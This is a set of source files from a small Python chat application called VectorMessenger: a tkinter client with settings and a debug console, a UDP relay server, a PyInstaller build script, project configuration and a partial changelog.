"blob_id": "e6c0a0aae716ead9c5ba37071a69c24386736f32", "content_id": "4df824a6d944daf73f01e76dc7d581ce43d1ee70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1184, "license_type": "no_license", "max_line_length": 117, "num_lines": 34, "path": "/PestAndSwot/migrations/0001_initial.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2 on 2021-05-14 08:27\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Pest',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('politics', models.TextField(verbose_name='p')),\n ('economics', models.TextField(verbose_name='e')),\n ('socials', models.TextField(verbose_name='s')),\n ('technologies', models.TextField(verbose_name='t')),\n ],\n ),\n migrations.CreateModel(\n name='Swot',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('strengths', models.TextField(verbose_name='s')),\n ('weaknesses', models.TextField(verbose_name='w')),\n ('opotunities', models.TextField(verbose_name='o')),\n ('threads', models.TextField(verbose_name='t')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.528273344039917, "alphanum_fraction": 0.5337163805961609, "avg_line_length": 38.8433723449707, "blob_id": "9a31727e3e92ce3ce484294a041e0d00557070d7", "content_id": "376118d184a48f122d6059c01d7800346dd31d07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3307, "license_type": "no_license", "max_line_length": 117, "num_lines": 83, "path": "/PestAndSwot/migrations/0002_auto_20210514_0839.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2 on 2021-05-14 08:39\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('PestAndSwot', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Economic',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('economics', models.TextField(verbose_name='e')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n migrations.CreateModel(\n name='Opportunity',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('opportunities', models.TextField(verbose_name='o')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n migrations.CreateModel(\n name='Politic',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('politics', models.TextField(verbose_name='p')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n migrations.CreateModel(\n name='Social',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('socials', models.TextField(verbose_name='s')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n migrations.CreateModel(\n name='Strength',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('strengths', models.TextField(verbose_name='s')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n migrations.CreateModel(\n name='Technology',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('technologies', models.TextField(verbose_name='t')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n migrations.CreateModel(\n name='Thread',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('threads', models.TextField(verbose_name='t')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n migrations.CreateModel(\n name='Weakness',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('weaknesses', models.TextField(verbose_name='w')),\n ('description', models.TextField(verbose_name='remarks')),\n ],\n ),\n migrations.DeleteModel(\n name='Pest',\n ),\n migrations.DeleteModel(\n name='Swot',\n ),\n ]\n" }, { "alpha_fraction": 0.6930894255638123, "alphanum_fraction": 0.6930894255638123, "avg_line_length": 36.92307662963867, "blob_id": "99830286545b48cf22dbf04c35677ef81b3fe6df", "content_id": "9a4f2c345ccf767ab50daadcebb0b49817e44957", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 492, "license_type": "no_license", "max_line_length": 88, "num_lines": 13, "path": "/geo/views.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom geo.models import GeoData\n# Create your views here.\n\ndef index(request):\n if(request.GET):\n # get data from AJAX in Javascript Function\n device_name = request.GET.get('device_name')\n latitude = request.GET.get('latitude')\n longitude = request.GET.get('longitude')\n geoData = GeoData(device_name=device_name,latitude=latitude,longitude=longitude)\n geoData.save()\n return render(request, 'geo/index.html')" }, { "alpha_fraction": 0.5268630981445312, "alphanum_fraction": 0.5788561701774597, "avg_line_length": 24.086956024169922, "blob_id": "c74a561982c4b4cc856a92790d56c88489fcf418", "content_id": "602b0cd17dbb23c16d4a8e1cc912e408c5f41764", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 577, "license_type": "no_license", "max_line_length": 71, "num_lines": 23, "path": "/PestAndSwot/migrations/0005_auto_20210516_0513.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2 on 2021-05-16 05:13\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('PestAndSwot', '0004_auto_20210514_0935'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='economic',\n name='description',\n field=models.TextField(blank=True, verbose_name='remarks'),\n ),\n migrations.AlterField(\n model_name='economic',\n name='economics',\n field=models.TextField(verbose_name='e'),\n ),\n ]\n" }, { "alpha_fraction": 0.8403041958808899, "alphanum_fraction": 0.8403041958808899, "avg_line_length": 36.71428680419922, "blob_id": "fd833e820a11c1daa77aef39c8dc176a15c87592", "content_id": "aec367e061b54b133d6bd87b009c33b0b99ff431", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 263, "license_type": "no_license", "max_line_length": 52, "num_lines": 7, "path": "/employee_status/admin.py", "repo_name": "haydane/django", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.contrib.admin.decorators import register\nfrom django.contrib.admin.sites import site\nfrom .models import EmpInfo, ZoneCategory\n# Register your models here.\nadmin.site.register(ZoneCategory)\nadmin.site.register(EmpInfo)" } ]
18
maximilionus/VectorMessenger_Zero
https://github.com/maximilionus/VectorMessenger_Zero
d0bba26734413c2ee2a4b89d30b4a3146ad7443a
a024dcc8a178943d2bd7a37fe252ba0eec311148
0b4fc0288efb3a0a6f054b1ebbf00290fb5d992d
refs/heads/master
2022-12-19T06:12:33.618860
2020-08-17T01:07:27
2020-08-17T01:07:27
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5962596535682678, "alphanum_fraction": 0.6095342636108398, "avg_line_length": 42.70192337036133, "blob_id": "fe1cd6eb7296e88961275ca418f869193105bd56", "content_id": "0e375c65a13475574afba074fde1723a38a00b64", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13635, "license_type": "permissive", "max_line_length": 172, "num_lines": 312, "path": "/VectorMessenger/client.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "import sys\nimport os\nimport tkinter as tk\nfrom threading import Thread\n\nfrom VectorMessenger.MessengerCore.Helpers import Global as h\nfrom VectorMessenger.MessengerCore.Helpers import Client as h_cl\nfrom VectorMessenger.MessengerCore.CoreClient import MessengerClient\nfrom VectorMessenger.MessengerCore.Encryption import VMCrypt\n\n\nclass VM_MainWindow:\n def __init__(self, root: object):\n def _on_close():\n self.messenger.stop_message_polling()\n root.destroy()\n root.protocol('WM_DELETE_WINDOW', _on_close)\n\n self.root = root\n\n # Header Menu\n self.HM_Root = tk.Menu(root)\n root.configure(menu=self.HM_Root)\n self.HM_Theme = tk.Menu(self.HM_Root, tearoff=0)\n self.HM_Root.add_cascade(label='Theme', menu=self.HM_Theme)\n self.HM_Theme.add_command(label='Light', command=lambda: self.set_color_scheme(0))\n self.HM_Theme.add_command(label='Dark', command=lambda: self.set_color_scheme(1))\n self.HM_Advanced = tk.Menu(self.HM_Root, tearoff=0)\n self.HM_Root.add_cascade(label='Settings', command=self.show_window_settings)\n self.HM_Root.add_cascade(label='Advanced', menu=self.HM_Advanced)\n self.HM_Advanced.add_command(label='Debug Console', command=self.show_debug_console)\n\n # Top\n self.frame_top = tk.Frame(root)\n self.chat_messages = tk.Text(self.frame_top, width=48, height=26, wrap=tk.WORD, state=tk.DISABLED, font='Arial 13')\n self.chat_scroll = tk.Scrollbar(self.frame_top, command=self.chat_messages.yview)\n self.chat_messages.config(yscrollcommand=self.chat_scroll.set)\n\n self.frame_top.grid(column=0, row=0, sticky=\"NSEW\")\n self.chat_messages.grid(column=0, row=0, sticky=\"NSEW\")\n self.chat_scroll.grid(column=1, row=0, sticky=\"NS\")\n self.frame_top.columnconfigure(0, weight=1)\n self.frame_top.rowconfigure(0, weight=1)\n\n # Bottom\n self.frame_bot = tk.Frame(root)\n self.chat_message_input = tk.Entry(self.frame_bot, width=50)\n self.chat_message_input.bind('<Return>', self.send_message)\n self.chat_btn_send_message = tk.Button(self.frame_bot, text=\"\\u27A2\", font=20, relief=tk.FLAT, command=self.send_message)\n\n self.frame_bot.grid(column=0, row=1, sticky=\"NSEW\")\n self.chat_message_input.grid(column=0, row=0, sticky=\"NSEW\")\n self.chat_btn_send_message.grid(column=1, row=0, sticky=\"SE\")\n self.frame_bot.columnconfigure(0, weight=1)\n self.frame_bot.rowconfigure(0, weight=0)\n\n root.columnconfigure(0, weight=1)\n root.rowconfigure(0, weight=1)\n\n # Update checker\n if '--disable-updater' not in sys.argv:\n self.HM_Root.add_command(label='', state=tk.DISABLED)\n self.update_checker = h_cl.UpdateChecker(self.HM_Root)\n Thread(target=self.update_checker.check, daemon=True).start()\n\n def init_messenger(self):\n self.messenger = MessengerClient(self)\n self.messenger.register_user()\n\n def show_message(self, text: str):\n \"\"\" Will show the message in chat ui \"\"\"\n text = text + '\\n'\n\n self.chat_messages.config(state=tk.NORMAL)\n self.chat_messages.insert(tk.END, text)\n self.chat_messages.config(state=tk.DISABLED)\n self.chat_messages.see(tk.END)\n\n def send_message(self, *args):\n message = self.chat_message_input.get()\n self.chat_message_input.delete(0, tk.END)\n if len(message) > 0:\n self.messenger.send_message(message)\n\n def refresh_color_scheme(self, screen=0, refreshAll=False):\n \"\"\"\n Will refresh color theme from json config file\n\n Keyword Arguments:\n screen {int} -- Select screen to refresh colors. 0 - Root, 1 - Settings (default: {0})\n refreshAll {bool} -- Will refresh theme on all screens (default: {False})\n \"\"\"\n if refreshAll:\n for i in range(2):\n self.refresh_color_scheme(screen=i)\n return 0\n\n cfg = h.VMConfig.get(1)\n if len(cfg) > 0:\n theme_name = 'theme_' + cfg['ui']['theme_selected']\n selected_theme = cfg['ui']['root'][theme_name]\n if screen == 0:\n def _update_theme_from_dict(theme: dict):\n self.frame_top.config(bg=theme['frame_bg'])\n self.chat_messages.config(bg=theme['chat_bg'], fg=theme['text'])\n self.frame_bot.config(bg=theme['chat_bg'])\n self.chat_message_input.config(bg=theme['message_input_bg'], fg=theme['text'])\n self.chat_btn_send_message.config(bg=theme['buttond_send_bg'], fg=theme['buttond_send_fg'])\n\n # Font update\n self.chat_messages.config(font=cfg['ui']['root']['font'])\n self.chat_message_input.config(font=cfg['ui']['root']['font'])\n # Theme update\n _update_theme_from_dict(selected_theme)\n if screen == 1:\n pass # TODO: Implement theme refreshing for settings window\n\n if theme_name == 'theme_light':\n self.HM_Theme.entryconfig(0, state=tk.DISABLED)\n self.HM_Theme.entryconfig(1, state=tk.NORMAL)\n elif theme_name == 'theme_dark':\n self.HM_Theme.entryconfig(1, state=tk.DISABLED)\n self.HM_Theme.entryconfig(0, state=tk.NORMAL)\n else:\n h.create_log('Cant refresh color theme - config file was not found -> Building config from built-in values and trying again')\n h.VMConfig.init(1)\n self.refresh_color_scheme(screen, refreshAll)\n\n def set_color_scheme(self, mode: int):\n \"\"\"\n Set color scheme to selected mode\n\n Arguments:\n mode {int} -- Theme type (0 - light, 1 - dark)\n \"\"\"\n cfg = h.VMConfig.get(1)\n theme = 'light' if mode == 0 else 'dark'\n cfg['ui']['theme_selected'] = theme\n h.VMConfig.write(cfg, 1)\n h.create_log(f'UI Theme set to {theme}')\n self.refresh_color_scheme()\n\n def show_window_settings(self):\n \"\"\" Will show window with settings \"\"\"\n ENTRY_WIDTH = 40\n\n window = tk.Toplevel(self.root)\n h_cl.iconbitmap_universal(window)\n window.title('Settings')\n window.resizable(False, False)\n window = tk.Frame(window)\n window.grid(row=0, column=0, padx=5, pady=5)\n\n # Username settings\n def _reload_uname():\n uname_currentLabel.config(text='Current username: ' + h.VMConfig.get(1)['username'])\n\n def _setUname():\n username = uname_input.get()\n if len(username) > 0:\n cfg = h.VMConfig.get(1)\n cfg['username'] = username\n h.VMConfig.write(cfg, 1)\n _reload_uname()\n else:\n uname_input.delete(0, tk.END)\n uname_input.insert(0, \"Username can't be empty!\")\n\n frame_setUsername = tk.LabelFrame(window, text='Username')\n uname_currentLabel = tk.Label(frame_setUsername, text='')\n _reload_uname()\n uname_input = tk.Entry(frame_setUsername, width=ENTRY_WIDTH)\n uname_btn_set = tk.Button(frame_setUsername, text='Set', command=_setUname, height=1, relief=tk.FLAT, bg='#dfdfdf')\n\n frame_setUsername.grid(row=0, column=0, sticky='NSEW')\n uname_currentLabel.grid(row=0, column=0, sticky='W')\n uname_input.grid(row=1, column=0, sticky='W')\n uname_btn_set.grid(row=1, column=1, sticky='EW')\n\n # Advanced\n def _reset_cfg():\n h.VMConfig.reset(1)\n _reload_uname()\n _hide_enc_key()\n self.refresh_color_scheme(refreshAll=True)\n h.create_log('Config file reset complete')\n\n frame_advanced = tk.LabelFrame(window, text='Advanced')\n adv_btn_resetConfig = tk.Button(frame_advanced, text='Reset To Defaults', command=_reset_cfg, height=1, relief=tk.FLAT, bg='#dfdfdf')\n\n frame_advanced.grid(row=0, column=1, sticky='NSEW', rowspan=10)\n adv_btn_resetConfig.grid(row=0, column=1, sticky='EW', padx=2)\n\n # Encryption settings\n def _set_enc_key():\n key = ekey_input_field.get()\n VMCrypt.set_key(key)\n _hide_enc_key()\n ekey_warning_label.config(text='Key was successfully set', fg='#009f00')\n\n def _show_enc_key():\n ekey_currentKey_label.config(text=f'Current Key: {h.VMConfig.get(1)[\"aes_key\"]}')\n\n def _hide_enc_key():\n ekey_currentKey_label.config(text='Current Key: ****')\n\n frame_encKeySettings = tk.LabelFrame(window, text='Encryption Key')\n ekey_warning_label = tk.Label(frame_encKeySettings, text='')\n ekey_currentKey_label = tk.Label(frame_encKeySettings, text='Current Key: ****', bg='#ffffff')\n ekey_btn_showCurrentKey = tk.Button(frame_encKeySettings, text='Show', command=_show_enc_key, height=1, relief=tk.FLAT, bg='#dfdfdf')\n ekey_input_field = tk.Entry(frame_encKeySettings, width=ENTRY_WIDTH)\n ekey_btn_set = tk.Button(frame_encKeySettings, text='Set', command=_set_enc_key, relief=tk.FLAT, bg='#dfdfdf')\n\n frame_encKeySettings.grid(row=1, column=0, sticky='NSEW')\n ekey_warning_label.grid(row=0, column=0, sticky='W')\n ekey_currentKey_label.grid(row=1, column=0, sticky='EW')\n ekey_btn_showCurrentKey.grid(row=1, column=1, sticky='EW')\n ekey_input_field.grid(row=2, column=0, sticky='E')\n ekey_btn_set.grid(row=2, column=1, sticky='EW')\n\n # Refresh theme\n # self.refresh_color_scheme(1) # TODO: Finish screen\n\n def show_debug_console(self):\n \"\"\"\n Show in-app console with actions logs.\n \"\"\"\n if hasattr(self, 'debug_console_showing'): return False\n\n def _handleConsoleInput(e):\n input_str: str = self.__debug_console_input.get()\n if input_str == 'clear':\n self.__debug_console_output.config(state=tk.NORMAL)\n self.__debug_console_output.delete(1.0, tk.END)\n self.__debug_console_output.config(state=tk.DISABLED)\n elif input_str == 'clear-chat':\n self.chat_messages.config(state=tk.NORMAL)\n self.chat_messages.delete(1.0, tk.END)\n self.chat_messages.config(state=tk.DISABLED)\n elif input_str == 'refresh-theme': self.refresh_color_scheme()\n elif input_str == 'polling-stop': self.messenger.stop_message_polling()\n elif input_str == 'test-raise': raise Exception('Test exception raised')\n elif input_str == 'version': h.create_log(f'Version: {h.VERSION}')\n elif input_str == 'updates-check': self.update_checker.check()\n elif input_str.startswith('eval'): eval(input_str[5:])\n else: h.create_log('No such command')\n self.__debug_console_input.delete(0, tk.END)\n\n def _on_close(window, obj):\n delattr(obj, 'debug_console_showing')\n obj.HM_Advanced.entryconfig(0, state=tk.NORMAL)\n std_redirect.disable()\n window.destroy()\n\n ui_window = tk.Toplevel(bg='#181818')\n ui_window.geometry('700x300')\n ui_window.title('Debug Console')\n ui_window.protocol('WM_DELETE_WINDOW', lambda: _on_close(ui_window, self))\n ui_window.columnconfigure(0, weight=1)\n ui_window.rowconfigure(0, weight=1)\n\n # Top\n self.__debug_console_FTop = tk.Frame(ui_window)\n self.__debug_console_FTop.columnconfigure(0, weight=1)\n self.__debug_console_FTop.rowconfigure(0, weight=1)\n self.__debug_console_output = tk.Text(self.__debug_console_FTop, bg='#262626', fg='white', font=h.VMConfig.get(1)['ui']['debug_console']['font'], state=tk.DISABLED)\n self.__debug_console_scrollbar = tk.Scrollbar(self.__debug_console_FTop, command=self.__debug_console_output.yview)\n self.__debug_console_output.config(yscrollcommand=self.__debug_console_scrollbar.set)\n self.__debug_console_FTop.grid(column=0, row=0, sticky=\"NSEW\")\n self.__debug_console_output.grid(column=0, row=0, sticky=\"NSEW\")\n self.__debug_console_scrollbar.grid(column=1, row=0, sticky=\"NS\")\n\n # Bottom\n self.__debug_console_FBot = tk.Frame(ui_window)\n self.__debug_console_FBot.columnconfigure(0, weight=1)\n self.__debug_console_FBot.rowconfigure(0, weight=1)\n self.__debug_console_input = tk.Entry(self.__debug_console_FBot, bg='#303030', fg='#00fa00', font='Consolas 10')\n self.__debug_console_input.bind('<Return>', _handleConsoleInput)\n self.__debug_console_FBot.grid(column=0, row=1, sticky=\"NSEW\")\n self.__debug_console_input.grid(column=0, row=0, sticky=\"EW\")\n\n self.HM_Advanced.entryconfig(0, state=tk.DISABLED)\n self.debug_console_showing = True\n\n # Redirect STD (-OUT && -ERROR) to debug console\n std_redirect = h_cl.RedirectSTD(self.__debug_console_output)\n\n\ndef startup():\n ui_root = tk.Tk()\n ui_root.title(h.APPDICT['client']['title'])\n h_cl.iconbitmap_universal(ui_root)\n ui_root.minsize(width=100, height=100)\n mainWindow = VM_MainWindow(ui_root)\n h.VMConfig.init(1)\n\n mainWindow.refresh_color_scheme()\n mainWindow.init_messenger()\n\n ui_root.mainloop()\n\n\ndef run_source():\n \"\"\" Startup from source code with poetry \"\"\"\n os.chdir(os.path.dirname(__file__))\n startup()\n\n\nif __name__ == '__main__':\n \"\"\" Built app startup \"\"\"\n os.chdir(os.path.abspath('.'))\n startup()\n" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 11.666666984558105, "blob_id": "3f13a2cbde9ef10b4733fe14891aa67ef18d5c7d", "content_id": "16d35c6756a6429273af16959dcc62cba20e13e1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "permissive", "max_line_length": 29, "num_lines": 3, "path": "/VectorMessenger/__init__.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "\"\"\"\nVector Messenger main package\n\"\"\"\n" }, { "alpha_fraction": 0.637499988079071, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 21.85714340209961, "blob_id": "54f297ac6a4ebb43a40ab31aaa8e3f31e5008527", "content_id": "44f78a06e2dd542830062b762b87ccc649a76933", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 160, "license_type": "permissive", "max_line_length": 68, "num_lines": 7, "path": "/VectorMessenger/MessengerCore/MessengerBase.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "import socket\n\n\nclass VMUDPBase:\n def __init__(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.settimeout(2.0)\n" }, { "alpha_fraction": 0.5980066657066345, "alphanum_fraction": 0.6611295938491821, "avg_line_length": 19.758621215820312, "blob_id": "68ea4f8bfb1ca5dc18f6913fd0cedfdff9f84385", "content_id": "10ade51a0d2bbd54403df482bfd346cb6335c148", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 602, "license_type": "permissive", "max_line_length": 44, "num_lines": 29, "path": "/pyproject.toml", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "[tool.poetry]\nname = \"vectormessenger\"\nversion = \"0.0.0\"\ndescription = \"\"\nauthors = [\"maximilionus <[email protected]>\"]\nlicense = \"MIT\"\npackages = [\n { include = \"./VectorMessenger\" }\n]\n\n[tool.poetry.scripts]\nclient = \"VectorMessenger.client:run_source\"\nserver = \"VectorMessenger.server:run_source\"\n\n[tool.poetry.dependencies]\npython = \">=3.7.0 <3.8\"\npyAesCrypt = \"^0.4.3\"\npillow = \"^7.2.0\"\npyinstaller = \"^3.6\"\npywin32-ctypes = \"^0.2.0\"\npefile = \"^2019.4.18\"\nujson = \"^3.1.0\"\n\n[tool.poetry.dev-dependencies]\nflake8 = \"^3.8.2\"\n\n[build-system]\nrequires = [\"poetry>=0.12\"]\nbuild-backend = \"poetry.masonry.api\"\n" }, { "alpha_fraction": 0.5871348977088928, "alphanum_fraction": 0.5894322395324707, "avg_line_length": 28.582523345947266, "blob_id": "87c5ec540bb4c7aeb35a6e6eef75a22b9ac94a7d", "content_id": "c88358a14138b7c9528346b2f9b0c116b4df1954", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3047, "license_type": "permissive", "max_line_length": 122, "num_lines": 103, "path": "/build.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "\"\"\"\nThis script will build sources to executable file.\nOutput folder is: ./dist/\nIgnore folder ./build/\n\nRun with argument -h or --help to get more info\n\nScript available startup args:\n client - build only client. (output to ./dist/VM_Client)\n server - build only server. (output to ./dist/VM_Server)\n full - full VM build. (output to ./dist/*)\n\"\"\"\n\nfrom time import time\nfrom sys import platform\nfrom os import pathsep, path\nfrom argparse import ArgumentParser\n\nimport PyInstaller.__main__\n\nfrom VectorMessenger.MessengerCore.Helpers import Global as h\n\n\nUPX = '--noupx'\nPATH_CLIENT_PY = './VectorMessenger/client.py'\nPATH_SERVER_PY = './VectorMessenger/server.py'\n\n\ndef build_client():\n # TODO: Exclude server-side\n icon = '--icon=./VectorMessenger/' + h.ICON_CLIENT_PATH[2:]\n\n HIDDEN_IMPORT = [\n 'pkg_resources.py2_warn'\n ]\n if platform != 'win32':\n # Fix of tkinter import for linux builds\n # ! Remove when legacy gui completely removed\n HIDDEN_IMPORT.extend(['tkinter', 'PIL._tkinter_finder'])\n HIDDEN_IMPORT = [('--hidden-import=' + arg) for arg in HIDDEN_IMPORT]\n\n ADD_FILES = [\n f'./VectorMessenger/data/ico{pathsep}./data/ico',\n f'./LICENSE{pathsep}.',\n ]\n ADD_FILES = [('--add-data=' + arg) for arg in ADD_FILES]\n\n PyInstaller.__main__.run([\n '--name={}'.format(\"VM_Client\"),\n *HIDDEN_IMPORT,\n '--windowed',\n *ADD_FILES,\n icon,\n UPX,\n PATH_CLIENT_PY\n ])\n\n\ndef build_server():\n # TODO: Exclude client-side and encryption modules\n icon = '--icon=./VectorMessenger/' + h.ICON_SERVER_PATH[2:]\n\n HIDDEN_IMPORT = [\n 'pkg_resources.py2_warn'\n ]\n HIDDEN_IMPORT = [('--hidden-import=' + arg) for arg in HIDDEN_IMPORT]\n\n ADD_FILES = (\n f'./VectorMessenger/data/ico{pathsep}./data/ico',\n f'./LICENSE{pathsep}.',\n )\n ADD_FILES = [('--add-data=' + arg) for arg in ADD_FILES]\n\n PyInstaller.__main__.run([\n '--name={}'.format(\"VM_Server\"),\n *HIDDEN_IMPORT,\n '--console',\n *ADD_FILES,\n icon,\n UPX,\n PATH_SERVER_PY\n ])\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(description=\"This utility will build Vector Messenger from source files. \"\n \"Result will be saved to directory: ./dist/\")\n parser.add_argument('mode', action=\"store\", default=\"full\", type=str, choices=[\"client\", \"server\", \"full\"], nargs=\"?\",\n help='Type of build. \"server\" - only server, \"client\" - only client, \"full\" - full build.')\n args = parser.parse_args()\n\n build_time_start = time()\n if args.mode == 'client':\n build_client()\n elif args.mode == 'server':\n build_server()\n else:\n build_client()\n build_server()\n\n print(f'\\n--- Vector Messenger build utility in mode \"{args.mode}\" ---'\n f'\\n> Built successfully in < {round(time() - build_time_start, 2)} > sec.'\n f'\\n> Output to \"{path.abspath(\"./dist/\")}\"')\n" }, { "alpha_fraction": 0.6925714015960693, "alphanum_fraction": 0.694857120513916, "avg_line_length": 24, "blob_id": "1abb06b9eaec2ed6876ef857dc0ed71ca8429f8b", "content_id": "9c40aebce0edbeb1ea30ed85b3b8e2cdd2cf2dd3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 875, "license_type": "permissive", "max_line_length": 91, "num_lines": 35, "path": "/VectorMessenger/server.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "from os import system as cmd, chdir, path\nfrom sys import platform as sysplatform\nfrom argparse import ArgumentParser\n\nfrom VectorMessenger.MessengerCore.Helpers.Global import APPDICT\nfrom VectorMessenger.MessengerCore.CoreServer import MessengerServer\n\n\nargs = None\n\n\ndef startup():\n if sysplatform == 'win32': cmd(f'title {APPDICT[\"server\"][\"title\"]}')\n MessengerServer(is_localhost=args.localhost)\n\n\ndef argparser():\n parser = ArgumentParser(description=\"Server launcher\")\n parser.add_argument(\"--localhost\", help=\"Run server on localhost\", action=\"store_true\")\n global args\n args = parser.parse_args()\n\n\ndef run_source():\n \"\"\" Startup from source code with poetry \"\"\"\n argparser()\n chdir(path.dirname(__file__))\n startup()\n\n\nif __name__ == '__main__':\n \"\"\" Built app startup \"\"\"\n argparser()\n chdir(path.abspath('.'))\n startup()\n" }, { "alpha_fraction": 0.5118155479431152, "alphanum_fraction": 0.5152737498283386, "avg_line_length": 34.408164978027344, "blob_id": "1d1186b96cd5acfc2aa19fb7a446249024a59da7", "content_id": "e45a2c8eaf93cf1271d6e3897d8ad575a694c0e0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1735, "license_type": "permissive", "max_line_length": 113, "num_lines": 49, "path": "/VectorMessenger/MessengerCore/CoreServer.py", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "import socket\nimport sys\n\nfrom VectorMessenger.MessengerCore.Helpers import Global as h\nfrom VectorMessenger.MessengerCore.MessengerBase import VMUDPBase\n\n\nclass MessengerServer(VMUDPBase):\n def __init__(self, is_localhost=False):\n super().__init__()\n self.cfg = h.VMConfig.init(0)\n\n if is_localhost:\n h.create_log('Running server on localhost')\n ip = 'localhost'\n else:\n h.create_log('Running server on a global network')\n ip = ''\n\n self.sock.bind((ip, self.cfg['connection']['port']))\n self.clients = []\n self.__online = True\n h.create_log('Server is online')\n\n try:\n while self.__online:\n try:\n data, addres = self.sock.recvfrom(8192)\n except socket.error:\n pass\n else:\n h.create_log(f'Receiving data from {addres}')\n try:\n reg_code = data.decode('utf-8')\n except Exception:\n if addres in self.clients:\n for client in self.clients:\n self.sock.sendto(data, client)\n else:\n if reg_code == f'VM{h.VERSION}_REGISTER_USER' and addres not in self.clients:\n self.clients.append(addres)\n h.create_log('User registration request received. New address added to clients list')\n except (KeyboardInterrupt, SystemExit):\n self.stop_server()\n\n def stop_server(self):\n self.__online = False\n h.create_log('Shutting down the server')\n sys.exit()\n" }, { "alpha_fraction": 0.6580796241760254, "alphanum_fraction": 0.7298985123634338, "avg_line_length": 31.049999237060547, "blob_id": "2498197e40d603348cd58c24fd6dc592db2be358", "content_id": "5d9d8d9b1de5f08425c6cd3ef5e842c5b54a305a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1281, "license_type": "permissive", "max_line_length": 104, "num_lines": 40, "path": "/CHANGELOG.md", "repo_name": "maximilionus/VectorMessenger_Zero", "src_encoding": "UTF-8", "text": "# **Vector Messenger** - Changelog\n> This changelog begins from `2020.07.01`. Any change before this date is not stated here.\n\n\n## Build [**B202008020120**](https://github.com/maximilionus/VectorMessenger/releases/tag/B202008020120)\n\n**2020-08-02**\n- Downgrade to python `3.7`\n- Allow only python `>=3.7` `<3.8`\n- Changed `cx-Freeze` build module to `PyInstaller`\n- Rewritten `build.py` script to fully support `PyInstaller`\n- Added ags handling to `build.py` with `argparse` module\n- Updated `.lock` file\n- Fixed paths handling for PyInstaller builds\n- `RedirectSTD` enhanced to be more easy to use\n\n**2020-07-22**\n- Run `update checker` thread as daemon\n- CamelCase to under_score\n\n**2020-07-21**\n- Removed `--log-messages` command from server-side\n\n**2020-07-14**\n- Removed `VMClient.png` from source again\n\n**2020-07-11**\n- Separated helpers to 'global' and 'client'\n- Removed build icons for platforms except win32\n- Optimized build script\n- Added command 'eval' to client debug 